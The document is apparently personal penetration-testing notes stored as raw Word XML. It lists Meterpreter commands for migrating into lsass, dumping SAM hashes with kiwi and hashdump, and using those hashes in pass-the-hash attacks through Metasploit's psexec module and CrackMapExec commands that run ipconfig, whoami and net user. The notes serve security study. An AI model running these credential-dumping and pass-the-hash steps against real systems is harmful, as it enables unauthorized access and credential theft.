    <w:p w14:paraId="3EE2E60F" w14:textId="2C7C4ED6" w:rsidR="000608A0" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pgrep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05B77A28" w14:textId="10C1B2A2" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mirgate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75533FB5" w14:textId="2CD5AE53" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F0C813C" w14:textId="23BFFBDF" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:r>
        <w:t xml:space="preserve">Load kiwi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC08B9" w14:textId="4D546F7C" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Lsa_dump_sam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="013F8FB5" w14:textId="3C79CFD3" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7EEE1E13" w14:textId="42428B08" w:rsidR="00942CAA" w:rsidRDefault="00173376">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ctrl+z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (background)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196684C" w14:textId="0C21CD1A" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:r>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E305509" w14:textId="7561AF19" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:r>
        <w:t>use(</w:t>
      </w:r>
      <w:r w:rsidR="0036271D">
        <w:t>window/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301F2541" w14:textId="160404C7" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CBB158" w14:textId="10E3FE76" w:rsidR="00173376" w:rsidRDefault="00173376">
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:t>always remember to use the different port for different sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4638A329" w14:textId="19B15C9E" w:rsidR="0036271D" w:rsidRDefault="0036271D">
      <w:r w:rsidRPr="0036271D">
        <w:t xml:space="preserve">set target &lt;ID&gt; tells Metasploit </w:t>
      </w:r>
      <w:r w:rsidRPr="0036271D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>which target profile to use</w:t>
      </w:r>
      <w:r w:rsidRPr="0036271D">
        <w:t xml:space="preserve"> for the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F2978" w14:textId="3C88CC8B" w:rsidR="0036271D" w:rsidRDefault="0036271D">
      <w:r w:rsidRPr="0036271D">
        <w:t xml:space="preserve">Exploits can crash if the </w:t>
      </w:r>
      <w:r w:rsidRPr="0036271D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wrong target</w:t>
      </w:r>
      <w:r w:rsidRPr="0036271D">
        <w:t xml:space="preserve"> is chosen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55136356" w14:textId="5873515B" w:rsidR="0036271D" w:rsidRDefault="00BF6EF5">
      <w:r w:rsidRPr="00BF6EF5">
        <w:t xml:space="preserve">set target tells Metasploit which </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6EF5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>specific OS/version/architecture profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF6EF5">
        <w:t xml:space="preserve"> to use when running an exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7FA21" w14:textId="77777777" w:rsidR="00BF6EF5" w:rsidRDefault="00BF6EF5"/>
    <w:p w14:paraId="1134D2C1" w14:textId="65058B09" w:rsidR="00173376" w:rsidRDefault="00B350DC">
      <w:r>
        <w:t>Set values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9601E0" w14:textId="0DCB6458" w:rsidR="00B350DC" w:rsidRDefault="00B350DC">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smbuser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65499E27" w14:textId="4101B2A5" w:rsidR="00B350DC" w:rsidRPr="00173376" w:rsidRDefault="00B350DC">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pass (clear/hash both LM:NTLM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172C975B" w14:textId="69064071" w:rsidR="00BF6EF5" w:rsidRDefault="00BF6EF5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Set target command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBF734" w14:textId="2A33901E" w:rsidR="00942CAA" w:rsidRDefault="00B350DC">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691AE26C" w14:textId="77777777" w:rsidR="00B350DC" w:rsidRDefault="00B350DC"/>
    <w:p w14:paraId="62FC7642" w14:textId="77777777" w:rsidR="00B350DC" w:rsidRDefault="00B350DC"/>
    <w:p w14:paraId="7C1D8131" w14:textId="77777777" w:rsidR="00B350DC" w:rsidRDefault="00B350DC"/>
    <w:p w14:paraId="1A352BFF" w14:textId="7676EEF7" w:rsidR="00942CAA" w:rsidRDefault="00173376">
      <w:r>
        <w:t>In order to perform</w:t>
      </w:r>
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the hash attack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> module </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> you must  have LM and NTLM hash. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FACD5EF" w14:textId="5B6537AD" w:rsidR="00173376" w:rsidRDefault="00173376" w:rsidP="00173376">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00173376">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E4A9E2" w14:textId="30B844D5" w:rsidR="00173376" w:rsidRDefault="00173376" w:rsidP="00173376">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A8E82" w14:textId="2D48E4B1" w:rsidR="00173376" w:rsidRDefault="00173376" w:rsidP="00173376">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Username:SID:LM:NTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="381493BF" w14:textId="77777777" w:rsidR="00BF6EF5" w:rsidRDefault="00BF6EF5" w:rsidP="00173376">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0922B36C" w14:textId="288EA989" w:rsidR="00173376" w:rsidRPr="00173376" w:rsidRDefault="00173376" w:rsidP="00173376">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">LM </w:t>
      </w:r>
      <w:r>
        <w:t>same for all the users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA9709" w14:textId="0AB9DB14" w:rsidR="00173376" w:rsidRDefault="00BF6EF5">
      <w:r>
        <w:t xml:space="preserve">Sessions -k </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C076625" w14:textId="5F6D1F85" w:rsidR="00BF6EF5" w:rsidRDefault="00BF6EF5">
      <w:r>
        <w:t xml:space="preserve">Kill all the sessions in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3C6EC" w14:textId="63DBEB6A" w:rsidR="00BF6EF5" w:rsidRDefault="0052741D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="706E8861" w14:textId="29596698" w:rsidR="0052741D" w:rsidRDefault="0052741D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C3E497C" w14:textId="77777777" w:rsidR="0052741D" w:rsidRDefault="0052741D"/>
    <w:p w14:paraId="527C8D67" w14:textId="77777777" w:rsidR="004960ED" w:rsidRDefault="004960ED"/>
    <w:p w14:paraId="161361BE" w14:textId="77777777" w:rsidR="004960ED" w:rsidRDefault="004960ED"/>
    <w:p w14:paraId="17998EE0" w14:textId="1480A3F2" w:rsidR="004960ED" w:rsidRDefault="004960ED">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004960ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004960ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71109507" w14:textId="03D7212D" w:rsidR="00643C0A" w:rsidRDefault="00643C0A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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-u administrator -H (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTML_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9C321" w14:textId="627C3AD4" w:rsidR="00643C0A" w:rsidRDefault="00643C0A"/>
    <w:p w14:paraId="6EFDFC01" w14:textId="39388682" w:rsidR="00643C0A" w:rsidRDefault="00643C0A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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0u administrator -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTLM_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -x ”ipconfig”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6CA95D" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRDefault="00643C0A"/>
    <w:p w14:paraId="69D191E6" w14:textId="2B12084F" w:rsidR="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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0u administrator -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTLM_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -x ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B5874" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A"/>
    <w:p w14:paraId="488D0430" w14:textId="16FFE455" w:rsidR="00643C0A" w:rsidRPr="004960ED" w:rsidRDefault="00643C0A" w:rsidP="00643C0A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Crackmapexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb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0u administrator -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NTLM_hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -x ”</w:t>
      </w:r>
      <w:r>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC85526" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRDefault="00643C0A" w:rsidP="00643C0A"/>
    <w:p w14:paraId="348F6C4F" w14:textId="77777777" w:rsidR="000317EF" w:rsidRPr="000317EF" w:rsidRDefault="000317EF" w:rsidP="000317EF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000317EF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Net user :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AF1B4" w14:textId="77777777" w:rsidR="000317EF" w:rsidRDefault="000317EF" w:rsidP="000317EF">
      <w:r>
        <w:t>Give all the users on the windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79289C" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRPr="004960ED" w:rsidRDefault="00643C0A" w:rsidP="00643C0A"/>
    <w:p w14:paraId="1C0AEA77" w14:textId="77777777" w:rsidR="00643C0A" w:rsidRPr="004960ED" w:rsidRDefault="00643C0A"/>
    <w:sectPr w:rsidR="00643C0A" w:rsidRPr="00496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A190B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDE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B3271"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C55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60BEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2E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A0936"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CD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86CAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A9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475BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="39C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1412C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB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712357">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="462816207">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="740560236">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1964145465">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="403064464">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1894777789">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="769087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3E4"/>
    <w:rsid w:val="000317EF"/>
    <w:rsid w:val="000608A0"/>
    <w:rsid w:val="00173376"/>
    <w:rsid w:val="001A5C38"/>
    <w:rsid w:val="0036271D"/>
    <w:rsid w:val="004960ED"/>
    <w:rsid w:val="0052741D"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00643C0A"/>
    <w:rsid w:val="007F3CFA"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00942CAA"/>
    <w:rsid w:val="009B1741"/>
    <w:rsid w:val="009C1516"/>
    <w:rsid w:val="00A173E4"/>
    <w:rsid w:val="00B350DC"/>
    <w:rsid w:val="00BF6EF5"/>
    <w:rsid w:val="00D4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C4E1C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{586B0B0A-BF1E-4B01-9E01-99EF30BCD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20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-18T03:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T04:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>